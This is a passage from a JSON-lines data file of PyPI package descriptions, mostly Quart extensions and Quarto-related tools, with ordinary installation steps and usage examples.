This app is used when running testing via py.test but can also be run standalone.Change Log[0.4.2] - 2021-12-23Change build system from setuptools to poetry[0.4.0] - 2021-11-08add type hints and type validation with mypyrequires asyncio-multisubscriber-queue 0.3.0pytest plugin to facilitate capturing events while other tests are running; plugin name isquart_events_catcheradded optional callbackswebsocket auth improvementstoken is now seemlessly managed using the user's session datatoken has an expiration; user is disconnected from the socket upon expirationa callback is available to further validate user using other criteria (like Flask-Login)"} +{"package": "quart-flask-patch", "pacakge-description": "Quart-Flask-Patch is a Quart extension that patches Quart to work with\nFlask extensions.QuickstartQuart-Flask-Patch must be imported first in your main module, so that\nthe patching occurs before any other code is initialised. For example,\nif you want to use Flask-Login,importquart_flask_patchfromquartimportQuartimportflask_loginapp=Quart(__name__)login_manager=flask_login.LoginManager()login_manager.init_app(app)Extensions known to workThe following flask extensions are tested and known to work with\nquart,Flask-BCryptFlask-CachingFlask-KVSessionFlask-LimiterSee\nalsoQuart-Rate-LimiterFlask-LoginSee\nalsoQuart-LoginorQuart-AuthFlask-MailFlask-MakoFlask-SeasurfFlask-SQLAlchemySee alsoQuart-DBFlask-WTFExtensions known not to workThe following flask extensions have been tested are known not to work\nwith quart,Flask-CORS, as it\nusesapp.make_responsewhich must be awaited. TryQuart-CORSinstead.Flask-Restfulas it subclasses the Quart (app) class with synchronous methods\noverriding asynchronous methods. TryQuart-OpenApiorQuart-Schemainstead.CaveatsFlask extensions must use the global request proxy variable to access\nthe request, any other access e.g. via~quart.local.LocalProxy._get_current_objectwill require\nasynchronous access. To enable this the request body must be fully\nreceived before any part of the request is handled, which is a\nlimitation not present in vanilla flask.Trying to use Flask alongside Quart in the same runtime will likely\nnot work, and lead to surprising errors.The flask extension must be limited to creating routes, using the\nrequest and rendering templates. Any other more advanced functionality\nmay not work.Synchronous functions will not run in a separate thread (unlike Quart\nnormally) and hence may block the event loop.Finally the flask_patching system also relies on patching asyncio, and\nhence other implementations or event loop policies are unlikely to\nwork.ContributingQuart-Flask-Patch is developed onGitHub. If you come across\nan issue, or have a feature request please open anissue. If you want\nto contribute a fix or the feature-implementation please do (typo\nfixes welcome), by proposing amerge request.TestingThe best way to test Quart-Flask-Patch is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Flask-Patchdocumentationis the best\nplaces to start, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-github-webhook", "pacakge-description": "No description available on PyPI."} +{"package": "quartical", "pacakge-description": "QuartiCalQuartiCal is the successor to CubiCal. It implements a suite of fast radio interferometric calibration routines exploiting complex optimisation. 
Unlike CubiCal, QuartiCal allows for any available Jones terms to be combined. It can also be deployed on a cluster (documentation under construction).InstallationQuartiCal can be installed using pip:pip install quartical.DocumentationDocumentation is available onreadthedocs.Public BetaQuartiCal is now in public beta! That means we want you to use (and break) it as much as possible. Any bugs and feature requests can be submitted via the issue tracker."} +{"package": "quartic-sdk", "pacakge-description": "QuarticSDKQuartic SDK is Quartic.ai's external software development kit which allows users to use assets, tags, and other intelligence outside the Quartic AI Platform. Using the Quartic SDK, third party developers who have access to the Quartic AI Platform can build custom applications.InstallationInstall usingpippip install quartic-sdkto Install complete package with all supported model libraries:pip install quartic-sdk[complete]...or follow the following steps to install it from the source:git clone https://github.com/Quarticai/QuarticSDK/\npython setup.py installExampleComprehensive documentation is available athttps://quarticsdk.readthedocs.io/en/latest/Here's an example on how the Quartic SDK can be used:Getting the assets, tags, batches from the server# Assuming that the Quartic.ai server is hosted at `https://test.quartic.ai/`,# with the login credentials as username and password is \"testuser\" and `testpassword respectively,# then use APIClient in the following format.fromquartic_sdkimportAPIClientclient=APIClient(\"https://test.quartic.ai/\",username=\"testuser\",password=\"testpassword\")user_assets=client.assets()# Get the list of all assets that the user has access toasset=user_assets.get(\"name\",\"Test Asset\")# Get a specific asset with the name \"Test Asset\"asset_tags=asset.get_tags()# Gets the list of all tagsfirst_tag=asset_tags.first()# Returns the first in the list of tagsfirst_tag_data_iterator=first_tag.data(start_time=1000000,stop_time=2000000)# Returns the data present in the first tag for the time range of 1000000 to 2000000# Assuming that the Quartic.ai server is hosted at `https://test.quartic.ai/`,# with the login credentials as username and password is \"testuser\" and `testpassword respectively,# then use GraphqlClient in the following format.fromquartic_sdkimportGraphqlClientclient=GraphqlClient(url='https://test.quartic.ai/',username='testuser',password='testpassword')# Executing Query by:query='''query MyQuery {Site {idname}}'''result=client.execute_query(query=query)# To execute query asynchronously use the function below.#You should see the following result:{'data':{'Site':[{'id':'1','name':'quartic'},{'id':'8','name':'ABC site 1'},{'id':'12','name':'XYZ 123'}]}asyncdefexecute_graphql_query():query='''query MyQuery {Site {idname}}'''resp=awaitclient.execute_async_query(query=query)returnresp# Note: The above function will return a coroutine object.# Example to upload a file.query='''mutation($file: Upload!, $edge_connector: Int!, $date_format: DateTime!) {uploadTelemetryCsv(file: $file,fileName: \"123\",edgeConnector: $edge_connector,dateFormat: $date_format){taskIdstatus}}'''variables={'file':open('','rb'),'edge_connector':'edgeConnector Id','date_format':'DatTime format'}response=client.execute_query(query=query,variables=variables)DocumentationTo run the documentation locally, run the following commands in terminal:cd docs\nmake html\n\ncd docs/source\nsphinx-build -b html . 
_build\nopen build/html/index.htmlTest CasesTo run the behaviour test cases, run the command:aloeTo run the unit test cases, run the command:pytest"} +{"package": "quartic-solver-kapoorlabs", "pacakge-description": "quartic-solver-kapoorlabsA package containing methods for solving quartic, cubic, quadratic, and depressed equations.Thiscapedpackage was generated withCookiecutterusing@caped'scookiecutter-templatetemplate.InstallationYou can installquartic-solver-kapoorlabsviapip:pip install quartic-solver-kapoorlabsTo install latest development version :pip install git+https://github.com/Kapoorlabs-CAPED/quartic-solver.gitContributingContributions are very welcome. Tests can be run withtox, please ensure\nthe coverage at least stays the same before you submit a pull request.LicenseDistributed under the terms of theBSD-3license,\n\"quartic-solver\" is free and open source softwareIssuesIf you encounter any problems, pleasefile an issuealong with a detailed description."} +{"package": "quartic-transformer", "pacakge-description": "No description available on PyPI."} +{"package": "quart-imp", "pacakge-description": "Quart-Imppip install quart-impWhat is Quart-Imp?Quart-Imp's main purpose is to help simplify the importing of blueprints, resources, and models.\nIt has a few extra features built in to help with securing pages and password authentication.NoteQuart-Flask-Patch is required to use Quart-Imp.Generate a Quart appquart-impinitExampleproject/\n\u2514\u2500\u2500 app/\n \u251c\u2500\u2500 blueprints/\n \u2502 \u2514\u2500\u2500 www/...\n \u251c\u2500\u2500 extensions/\n \u2502 \u2514\u2500\u2500 __init__.py\n \u251c\u2500\u2500 resources/\n \u2502 \u251c\u2500\u2500 static/...\n \u2502 \u251c\u2500\u2500 templates/...\n \u2502 \u2514\u2500\u2500 routes.py\n \u2514\u2500\u2500 __init__.py# app/extensions/__init__.pyimportquart_flask_patchfromflask_sqlalchemyimportSQLAlchemyfromquart_impimportImp_=quart_flask_patchimp=Imp()db=SQLAlchemy()# app/__init__.pyfromquartimportQuartfromapp.extensionsimportimp,dbdefcreate_app():app=Quart(__name__,static_url_path=\"/\")imp.init_app(app)imp.import_app_resources(files_to_import=[\"*\"],folders_to_import=[\"*\"])imp.import_blueprints(\"blueprints\")imp.import_models(\"models\")db.init_app(app)@app.before_servingasyncdefcreate_tables():db.create_all()returnapp"} +{"package": "quart-injector", "pacakge-description": "Quart InjectorDependency injecetion for quart apps.\ud83d\udee0 Installingpoetry add quart-injector\ud83c\udf93 Usageimporttypingimportquartimportinjectorimportquart_injectorGreeting=typing.NewType(\"Greeting\",str)defconfigure(binder:injector.Binder)->None:binder.bind(Greeting,to=\"Hello\")app=quart.Quart(__name__)@app.route(\"/\")@app.route(\"/\",defaults={\"name\":\"World\"})asyncdefgreeting_view(greeting:injector.Inject[Greeting],name:str)->str:returnf\"{greeting}{name}!\"quart_injector.wire(app,configure)\ud83d\udcda HelpSee theDocumentationor ask questions on theDiscussionboard.\u2696\ufe0f LicenceThis project is licensed under theMIT licence.All documentation and images are licenced under theCreative Commons Attribution-ShareAlike 4.0 International License.\ud83d\udcdd MetaThis project usesSemantic Versioning."} +{"package": "quart_minify", "pacakge-description": "quart_minifyA Quart extension to minify quart response for html, javascript, css and less compilation as well.Install:With pippip install quart-minifyFrom the source:git clone https://github.com/AceFire6/quart_minify.gitcd quart_minifypython setup.py installSetup:Inside Quart 
app:fromquartimportQuartfromquart_minify.minifyimportMinifyapp=Quart(__name__)Minify(app=app)Result:Before:

Example ! (a small pretty-printed HTML page)
After:
Example ! (the same page minified onto a single line)
Options:def__init__(self,app=None,html=True,js=False,cssless=True,cache=True,fail_safe=True,bypass=()):\"\"\"A Quart extension to minify flask response for html,javascript, css and less.@param: app Quart app instance to be passed (default:None).@param: js To minify the css output (default:False).@param: cssless To minify spaces in css (default:True).@param: cache To cache minifed response with hash (default: True).@param: fail_safe to avoid raising error while minifying (default True).@param: bypass a list of the routes to be bypassed by the minifierNotice: bypass route should be identical to the url_rule used for example:bypass=['/user/', '/users']\"\"\"Credit:Adapted fromflask_minifyhtmlmin: HTML python minifier.lesscpy: Python less compiler and css minifier.jsmin: JavaScript python minifier."} +{"package": "quart-mongo", "pacakge-description": "Quart MongoQuart-Mongo bridgesQuart,Motor, andOdmanticto create a powerful MongoDB extension to use in your Quart applications. It also provides some convenience helpers as well as being able to work withQuart-Schema.InstallationInstall the extension with the following command:$ pip3 install quart-mongoUsageTo use the extension simply import the class wrapper and pass the Quart app\nobject back to here. Do so like this:from quart import Quart\nfrom quart_mongo import Mongo\n\napp = Quart(__name__)\nbabel = Mongo(app)DocumentationThe documentation for Quart-Mongo and is availablehere."} +{"package": "quarto", "pacakge-description": "QuartoPython interface to Quarto, an academic, scientific, and technical publishing system built onPandoc.In addition to the core capabilities of Pandoc, Quarto includes:Support for embedding output from R and Python via integration with knitr and Jupyter.A project system for rendering groups of documents at once.Flexible ways to specify rendering options, including project-wide options and per-format options.Cross references for figures, tables, equations, sections, listings, proofs, and more.Sophisticated layout for panels of figures, tables, and other content.Automatic installation of required LaTeX packages when rendering PDF output.For more information on Quarto, see the project GitHub repositories athttps://github.com/quarto-dev/"} +{"package": "quart-oauth2-discord.py", "pacakge-description": "#Quart-OAuth2-Discord.pyA library to make the discord authentication system easier for Quart Users.To install this library:$python3-mpipinstallQuart-OAuth2-Discord.pyIf you're in Windows:python-mpipinstallQuart-OAuth2-Discord.pyAn example of Quart-app-with-Discord-BotfromtypingimportListfromquartimportQuart,redirect,render_template_string,request,url_forfromquart_oauth2_discord_pyimportDiscordOauth2Client,Guildapp=Quart(__name__)app.secret_key=b\"random bytes representing quart secret key\"app.config['DISCORD_CLIENT_ID']=\"Client ID here\"app.config['DISCORD_CLIENT_SECRET']='CLIENT_SECRET_HERE'app.config['SCOPES']=['identify','guilds']app.config['DISCORD_REDIRECT_URI']='http://127.0.0.1:5000/callback'app.config['DISCORD_BOT_TOKEN']=Noneclient=DiscordOauth2Client(app)@app.route('/')asyncdefindex():return\"Hello!\"@app.route('/login/',methods=['GET'])asyncdeflogin():returnawaitclient.create_session()@app.route('/callback')asyncdefcallback():awaitclient.callback()returnredirect(url_for('index'))defreturn_guild_names_owner(guilds_:List[Guild]):# print(list(sorted([fetch_guild.name for fetch_guild in guilds_ if 
fetch_guild.is_owner_of_guild()])))returnlist(sorted([fetch_guild.nameforfetch_guildinguilds_iffetch_guild.is_owner_of_guild()]))defsearch_guilds_for_name(guilds_,query):# print(list(sorted([fetch_guild.name for fetch_guild in guilds_ if fetch_guild.is_owner_of_guild() and fetch_guild.name == query])))returnlist(sorted([fetch_guild.nameforfetch_guildinguilds_iffetch_guild.is_owner_of_guild()andfetch_guild.name==query]))@app.route('/guilds')asyncdefguilds():template_string=\"\"\"Guilds
Your guilds:
    {% for guild_name in guild_names %}
      {{ guild_name }}
    {% endfor %}
\"\"\"ifrequest.args.get('guild_name'):returnawaitrender_template_string(template_string,guild_names=search_guilds_for_name(awaitclient.fetch_guilds(),request.args.get('guild_name')))returnawaitrender_template_string(template_string,guild_names=return_guild_names_owner(awaitclient.fetch_guilds()))@app.route('/me')@client.is_logged_inasyncdefme():user=awaitclient.fetch_user()image=user.avatar_url# noinspection HtmlUnknownTargetreturnawaitrender_template_string(\"\"\"
Login Successful
\"Avatar\"\"\",image_url=image)if__name__=='__main__':app.run()This is not yet documented. It will be documented soon."} +{"package": "quarto-cli", "pacakge-description": "QuartoQuarto is an open-source scientific and technical publishing system built onPandoc. Quarto documents are authored usingmarkdown, an easy to write plain text format.In addition to the core capabilities of Pandoc, Quarto includes:Embedding code and output from Python, R, Julia, and JavaScript via integration withJupyter,Knitr, andObservable.A variety of extensions to Pandoc markdown useful for technical writing including cross-references, sub-figures, layout panels, hoverable citations and footnotes, callouts, and more.A project system for rendering groups of documents at once, sharing options across documents, and producing aggregate output likewebsitesandbooks.Authoring using a wide variety of editors and notebooks includingJupyterLab,RStudio, andVS Code.Avisual markdown editorthat provides a productive writing interface for composing long-form documents.Learn more about Quarto athttps://quarto.org.InstallTo install the latest released version of Quarto, use:pipinstallquarto-cliNoteThe currentquarto-clipackage downloads required Quarto binary files from GitHub during installation. We are investigating providing pre-built wheel files to make installation more robust.UninstallTo uninstall thequarto-clipackage, use:pipuninstallquarto-cli"} +{"package": "quartodoc", "pacakge-description": "Overviewquartodoclets you quickly generate Python package API reference\ndocumentation using Markdown andQuarto. quartodoc\nis designed as an alternative toSphinx.Check out the below screencast for a walkthrough of creating a\ndocumentation site, or read on for instructions.Installationpython-mpipinstallquartodocor from GitHubpython-mpipinstallgit+https://github.com/machow/quartodoc.gitInstall QuartoIf you haven\u2019t already, you\u2019ll need toinstall\nQuartobefore you can use\nquartodoc.Basic useGetting started with quartodoc takes two steps: configuring quartodoc,\nthen generating documentation pages for your library.You can configure quartodoc alongside the rest of your Quarto site in\nthe_quarto.ymlfile you are already using for Quarto. Toconfigure\nquartodoc,\nyou need to add aquartodocsection to the top level your_quarto.ymlfile. 
Below is a minimal example of a configuration that\ndocuments thequartodocpackage:project:type:website# tell quarto to read the generated sidebarmetadata-files:-_sidebar.ymlquartodoc:# the name used to import the package you want to create reference docs forpackage:quartodoc# write sidebar data to this filesidebar:_sidebar.ymlsections:-title:Some functionsdesc:Functions to inspect docstrings.contents:# the functions being documented in the package.# you can refer to anything: class methods, modules, etc..-get_object-previewNow that you have configured quartodoc, you can generate the reference\nAPI docs with the following command:quartodocbuildThis will create areference/directory with anindex.qmdand\ndocumentation pages for listed functions, likeget_objectandpreview.Finally, preview your website with quarto:quartopreviewRebuilding siteYou can preview yourquartodocsite using the following commands:First, watch for changes to the library you are documenting so that your\ndocs will automatically re-generate:quartodocbuild--watchSecond, preview your site:quartopreviewLooking up objectsGenerating API reference docs for Python objects involves two pieces of\nconfiguration:the package name.a list of objects for content.quartodoc can look up a wide variety of objects, including functions,\nmodules, classes, attributes, and methods:quartodoc:package:quartodocsections:-title:Some sectiondesc:\"\"contents:-get_object# function: quartodoc.get_object-ast.preview# submodule func: quartodoc.ast.preview-MdRenderer# class: quartodoc.MdRenderer-MdRenderer.render# method: quartodoc.MDRenderer.render-renderers# module: quartodoc.renderersThe functions listed incontentsare assumed to be imported from the\npackage.Learning moreGoto the next\npageto\nlearn how to configure quartodoc sites, or check out these handy pages:Examples\npage: sites\nusing quartodoc.Tutorials\npage:\nscreencasts of building a quartodoc site.Docstring issues and\nexamples:\ncommon issues when formatting docstrings.Programming, the big\npicture:\nthe nitty gritty of how quartodoc works, and how to extend it."} +{"package": "quart-openapi", "pacakge-description": "Documentation can be found onhttps://factset.github.io/quart-openapi/Quart-OpenAPI is an extension forQuartthat adds support for generating a openapi.json file using openapi 3.0.\nIf you are familiar withQuart, this just wraps around it to add a openapi.json route similar toFlask-RESTXgenerating a swagger.json route and adds a Resource base class for building RESTful APIs.CompatibilityQuart-OpenAPI requires Python 3.6+ becauseQuartrequires it.Starting from version 1.6.0, Quart-OpenAPI requires python 3.7+ in order to avoid having to maintain multiple versions\nof function definitions for compatibility with the older versions ofQuartthat supported Python 3.6.InstallationYou can install via pip$pipinstallquart-openapiIf you are developing the module and want to also be able to build the documentation, make sure\nto also install the dependencies from the extras \u2018doc\u2019 package like so:$pipinstall'quart-openapi[doc]'$pythonsetup.pybuild_sphinxQuick StartIf you\u2019re familiar withQuartthen the quick start doesn\u2019t change much:fromquart_openapiimportPint,Resourceapp=Pint(__name__,title='Sample App')@app.route('/')classRoot(Resource):asyncdefget(self):'''Hello World Route\n\n This docstring will show up as the description and short-description\n for the openapi docs for this route.\n '''return\"hello\"This is equivalent to using the following withQuartas 
normal:fromquartimportQuartapp=Quart(__name__)@app.route('/')asyncdefhello():return\"hello\"Except that by usingPintandResourceit will also\nadd a route for \u2018/openapi.json\u2019 which will contain the documentation of the route and use the docstring for the\ndescription.Unit TestsUnit tests can be run through setuptools also:$pythonsetup.pytestRequest ValidationRequest validation like you can get withFlask-RESTX!You can either create validator models on the fly or you can create a jsonschema document for base models\nand then use references to it. For an on-the-fly validator:expected=app.create_validator('sample_request',{'type':'object','properties':{'foobar':{'type':'string'},'baz':{'oneOf':[{'type':'integer'},{'type':'number','format':'float'}]}}})@app.route('/')classSample(Resource):@app.expect(expected)asyncdefpost(self):# won't get here if the request didn't match the expected schemadata=awaitrequest.get_json()returnjsonify(data)The default content type is \u2018application/json\u2019, but you can specify otherwise in the decorator:{\"$schema\":\"http://json-schema.org/schema#\",\"id\":\"schema.json\",\"components\":{\"schemas\":{\"binaryData\":{\"type\":\"string\",\"format\":\"binary\"}}}}app=Pint(__name__,title='Validation Example',base_model_schema='schema.json')stream=app.create_ref_validator('binaryData','schemas')@app.route('/')classBinary(Resource):@app.expect((stream,'application/octet-stream',{'description':'gzip compressed data'}))@app.response(HTTPStatus.OK,'Success')asyncdefpost(self):# if the request didn't have a 'content-type' header with a value# of 'application/octet-stream' it will be rejected as invalid.raw_data=awaitrequest.get_data(raw=True)# ... do something with the datareturn\"Success!\"In the example above, it\u2019ll open, read, and json parse the fileschema.jsonand then use it as the basis\nfor referencing models and creating validators. Currently the validator won\u2019t do more than validate content-type\nfor content-types other than \u2018application/json\u2019."} +{"package": "quart-peewee", "pacakge-description": "Quart-PeeweeIntegration between theQuartweb framework and thePeewee ORMthrough thePeewee-AIOInstallationpip install quart-peeweeUsagefrompeewee_aio.fieldsimportCharFieldfromquartimportQuart,requestfromquart_peeweeimportQuartPeeweeapp=Quart(__name__)db=QuartPeewee(\"aiosqlite:///app.db\")db.init_app(app)classUser(db.Model):name=CharField(unique=True)@app.before_servingasyncdefbefore_serving():awaitdb.create_tables()@app.route(\"/create_user\",methods=[\"POST\"])asyncdefcreate_user():data=awaitrequest.get_json(force=True)awaitUser.create(name=data[\"name\"])return\"\"@app.route(\"/get_users\",methods=[\"GET\"])asyncdefget_users():returnawaitUser.select().dicts()@app.route(\"/delete_user\",methods=[\"DELETE\"])asyncdefdelete_user():data=awaitrequest.get_json(force=True)awaitUser.delete().where(User.name==data[\"name\"])return\"\"if__name__==\"__main__\":app.run()"} +{"package": "quart-rate-limiter", "pacakge-description": "Quart-Rate-Limiter is an extension forQuartto allow for rate limits to be\ndefined and enforced on a per route basis. 
The 429 error response\nincludes aRFC7231compliantRetry-Afterheader and the successful responses contain headers\ncompliant with theRateLimit Header Fields for HTTPRFC\ndraft.UsageTo add a rate limit first initialise the RateLimiting extension with\nthe application,app=Quart(__name__)rate_limiter=RateLimiter(app)or via the factory pattern,rate_limiter=RateLimiter()defcreate_app():app=Quart(__name__)rate_limiter.init_app(app)returnappNow this is done you can apply rate limits to any route by using therate_limitdecorator,@app.route('/')@rate_limit(1,timedelta(seconds=10))asyncdefhandler():...Or to apply rate limits to all routes within a blueprint by using thelimit_blueprintfunction,blueprint=Blueprint(\"name\",__name__)limit_blueprint(blueprint,1,timedelta(seconds=10))Or to apply rate limits to all routes in an app, define the default\nlimits when initialising the RateLimiter,rate_limiter=RateLimiter(default_limits=[RateLimit(1,timedelta(seconds=10))])and then to exempt a route,@app.route(\"/exempt\")@rate_exemptasyncdefhandler():...To alter the identification of remote users you can either supply a\nglobal key function when initialising the extension, or on a per route\nbasis.By default rate limiting information (TATs) will be stored in memory,\nwhich will result in unexpected behaviour if multiple workers are\nused. To solve this a redis store can be used by installing theredisextra (pip installquart-rate-limiter[redis]) and then\nusing as so,fromquart_rate_limiter.redis_storeimportRedisStoreredis_store=RedisStore(address)RateLimiter(app,store=redis_store)This store usesredis,\nand any extra keyword arguments passed to theRedisStoreconstructor will be passed to the rediscreate_redisfunction.A custom store is possible, see theRateLimiterStoreABCfor the\nrequired interface.Simple examplesTo limit a route to 1 request per second and a maximum of 20 per minute,@app.route('/')@rate_limit(1,timedelta(seconds=1))@rate_limit(20,timedelta(minutes=1))asyncdefhandler():...Alternatively thelimitsargument can be used for multiple limits,@app.route('/')@rate_limit(limits=[RateLimit(1,timedelta(seconds=1)),RateLimit(20,timedelta(minutes=1)),],)asyncdefhandler():...To identify remote users based on their authentication ID, rather than\ntheir IP,asyncdefkey_function():returncurrent_user.idRateLimiter(app,key_function=key_function)Thekey_functionis a coroutine function to allow session lookups\nif appropriate.ContributingQuart-Rate-Limiter is developed onGitHub. You are very welcome to\nopenissuesor\nproposemerge requests.TestingThe best way to test Quart-Rate-Limiter is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThis README is the best place to start, after that try opening anissue."} +{"package": "quart-redis", "pacakge-description": "Quart-RedisAn easy way of setting up a redis connection in quart.Requirementsquart >= 0.18redis >= 4.2Example of Usepip install quart-redisfromquartimportQuartfromquart_redisimportRedisHandler,get_redisapp=Quart(__name__)app.config[\"REDIS_URI\"]=\"redis://localhost\"# override default connection attempts, set < 0 to disable# app.config[\"REDIS_CONN_ATTEMPTS\"] = 3redis_handler=RedisHandler(app)@app.route(\"/\")asyncdefindex():redis=get_redis()val=awaitredis.get(\"my-key\")ifvalisNone:awaitredis.set(\"my-key\",\"it works!\")val=awaitredis.get(\"my-key\")returnval"} +{"package": "quart-schema", "pacakge-description": "Quart-Schema is a Quart extension that provides schema validation and\nauto-generated API documentation. 
This is particularly useful when\nwriting RESTful APIs.Quart-Schema can use eithermsgspecorpydanticto validate.QuickstartQuart-Schema can validate an existing Quart route by decorating it\nwithvalidate_querystring,validate_request, orvalidate_response. It can also validate the JSON data sent and\nreceived over websockets using thesend_asandreceive_asmethods.fromdataclassesimportdataclassfromdatetimeimportdatetimefromquartimportQuart,websocketfromquart_schemaimportQuartSchema,validate_request,validate_responseapp=Quart(__name__)QuartSchema(app)@dataclassclassTodo:task:strdue:datetime|None@app.post(\"/\")@validate_request(Todo)@validate_response(Todo,201)asyncdefcreate_todo(data:Todo)->tuple[Todo,int]:...# Do something with data, e.g. save to the DBreturndata,201@app.websocket(\"/ws\")asyncdefws()->None:whileTrue:data=awaitwebsocket.receive_as(Todo)...# Do something with data, e.g. save to the DBawaitwebsocket.send_as(data,Todo)The documentation is served by default at/openapi.jsonaccording\nto the OpenAPI standard, or at/docsfor aSwaggerUIinterface, or/redocsfor\naredocinterface, or/scalarfor aScalarinterface. Note that there is currently no documentation standard for\nWebSockets.ContributingQuart-Schema is developed onGitHub. If you come across an\nissue, or have a feature request please open anissue. If you want to\ncontribute a fix or the feature-implementation please do (typo fixes\nwelcome), by proposing amerge request.TestingThe best way to test Quart-Schema is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Schemadocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-shell-ipython", "pacakge-description": "quart-shell-ipythongenerated from flask-shell-ipythonStart quart shell with ipython, if it installed"} +{"package": "quart-sqlalchemy", "pacakge-description": "Quart-SQLAlchemy provides a simple wrapper for SQLAlchemy made for humans. I\u2019ve kept things as\nsimple as possible, abstracted much complexity, and implemented everything using the current\nbest practices recommended by the SQLAlchemy developers and targets version 2.0.x+. As a\nconvenience, a framework adapter is provided for Quart, but the rest of this library is framework\nagnostic.The bundled SQLAlchemy object intentionally discards the use of scoped_session and it\u2019s async\ncounterpart. With version 2.x+, it\u2019s expected that sessions are short lived and vanilla and\ncontext managers are used for managing sesssion lifecycle. Any operations that intend to change\nstate should open an explicit transaction using the context manager returned by session.begin().\nThis pattern of usage prevents problems like sessions being shared between processes, threads, or\ntasks entirely, as opposed to the past conventions of mitigating this type of sharing. Another\nbest practice is expecting any transaction to intermittently fail, and structuring your logic to\nautomatically perform retries. 
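As a rough illustration of that pattern (using plain SQLAlchemy 2.0 rather than this package's own helpers), a sketch might look like the following; the model, engine URL, and retry policy are assumptions made only for illustration.

```python
# Minimal sketch of the short-lived-session pattern described above,
# using plain SQLAlchemy 2.0. The model, URL and retry policy are
# illustrative assumptions, not part of quart-sqlalchemy's API.
import time

import sqlalchemy as sa
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, sessionmaker


class Base(DeclarativeBase):
    pass


class User(Base):
    __tablename__ = "user"
    id: Mapped[int] = mapped_column(primary_key=True, autoincrement=True)
    name: Mapped[str] = mapped_column(default="default")


engine = sa.create_engine("sqlite:///example.db")
Base.metadata.create_all(engine)
Session = sessionmaker(engine, expire_on_commit=False)


def add_user_with_retries(name: str, attempts: int = 3) -> None:
    """Open a fresh session per attempt and wrap the write in an explicit transaction."""
    for attempt in range(attempts):
        try:
            with Session() as session:        # short-lived, vanilla session
                with session.begin():         # explicit transaction; commits or rolls back
                    session.add(User(name=name))
            return
        except OperationalError:
            if attempt == attempts - 1:
                raise
            time.sleep(0.1 * (attempt + 1))   # simple backoff before retrying


add_user_with_retries("example")
```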
You can find the retrying session context managers in the retry\nmodule.InstallingInstall and update usingpip:$ pip install quart-sqlalchemyInstall the latest release with unreleased pytest-asyncio fixes:$ pip install git+ssh://git@github.com/joeblackwaslike/quart-sqlalchemy.git#egg=quart_sqlalchemyInstall a wheel from our releases:$ pip install https://github.com/joeblackwaslike/quart-sqlalchemy/releases/download/v3.0.1/quart_sqlalchemy-3.0.1-py3-none-any.whlAdd to requirements.txt:quart-sqlalchemy @ https://github.com/joeblackwaslike/quart-sqlalchemy/releases/download/v3.0.1/quart_sqlalchemy-3.0.1-py3-none-any.whlA Simple Exampleimportsqlalchemyassaimportsqlalchemy.ormfromsqlalchemy.ormimportMapped,mapped_columnfromquartimportQuartfromquart_sqlalchemyimportSQLAlchemyConfigfromquart_sqlalchemy.frameworkimportQuartSQLAlchemyapp=Quart(__name__)db=QuartSQLAlchemy(config=SQLAlchemyConfigbinds=dict(default=dict(engine=dict(url=\"sqlite:///\",echo=True,connect_args=dict(check_same_thread=False),),session=dict(expire_on_commit=False,),))),app,)classUser(db.Model)__tablename__=\"user\"id:Mapped[int]=mapped_column(sa.Identity(),primary_key=True,autoincrement=True)name:Mapped[str]=mapped_column(default=\"default\")db.create_all()withdb.bind.Session()ass:withs.begin():user=User(username=\"example\")s.add(user)s.flush()s.refresh(user)users=s.scalars(sa.select(User)).all()print(user,users)assertuserinusersContributingFor guidance on setting up a development environment and how to make a\ncontribution to Quart-SQLAlchemy, see thecontributing guidelines."} +{"package": "quart-tasks", "pacakge-description": "Quart-Tasks is a Quart extension that provides scheduled background\ntasks.QuickstartQuart-Tasks is used by associating it with an app and then registering\nscheduled tasks,fromquartimportQuartfromquart_tasksimportQuartTasksapp=Quart(__name__)tasks=QuartTasks(app)@tasks.cron(\"*/5 * * * *\")# every 5 minutesasyncdefinfrequent_task():...# Do something@tasks.cron(seconds=\"*1/0\",# every 10 secondsminutes=\"*\",hours=\"*\",day_of_month=\"*\",month=\"*\",day_of_week=\"*\",)asyncdeffrequent_task():...# Do something@tasks.periodic(timedelta(seconds=10))asyncdefregular_task():...# Do SomethingNote: the non-standard cron format (for seconds) is as defined bycroniter.The tasks will then run in the background as the app itself runs or\nthey can be run manually via the CLIquartrun-tasks.ContributingQuart-Tasks is developed onGitHub. If you come across an issue,\nor have a feature request please open anissue. If you want to\ncontribute a fix or the feature-implementation please do (typo fixes\nwelcome), by proposing amerge request.TestingThe best way to test Quart-Tasks is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Tasksdocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-trio", "pacakge-description": "Quart-Trio is an extension forQuartto support theTrioevent loop. 
This is an\nalternative to using the asyncio event loop present in the Python\nstandard library and supported by default in Quart.QuickstartQuartTrio can be installed viapip,$pipinstallquart-trioand requires Python 3.8 or higher (seepython version supportfor reasoning).A minimal Quart example is,fromquartimportwebsocketfromquart_trioimportQuartTrioapp=QuartTrio(__name__)@app.route('/')asyncdefhello():return'hello'@app.websocket('/ws')asyncdefws():whileTrue:awaitwebsocket.send('hello')app.run()if the above is in a file calledapp.pyit can be run as,$pythonapp.pyTo deploy in a production setting see thedeploymentdocumentation.ContributingQuart-Trio is developed onGitHub. You are very welcome to\nopenissuesor\nproposemerge requests.TestingThe best way to test Quart-Trio is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpTheQuart-TrioandQuartdocumentation are the best\nplaces to start, after that try searchingstack overflow, if you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-uploads", "pacakge-description": "Quart UploadsQuart-Uploads allows your application to flexibly and efficiently handle file\nuploading and serving the uploaded files.You can create different sets of uploads - one for document attachments, one\nfor photos, etc. - and the application can be configured to save them all in\ndifferent places and to generate different URLs for them.For more information on Quart,visit hereQuart-Uploads is based onFlask-Uploadsby maxcountryman."} +{"package": "quartustcl", "pacakge-description": "quartustclquartustclis a Python module to interact with Intel Quartus Tcl\nshells. It opens a single shell in a subprocess, then helps you with\nreading and writing data to it, and parsing 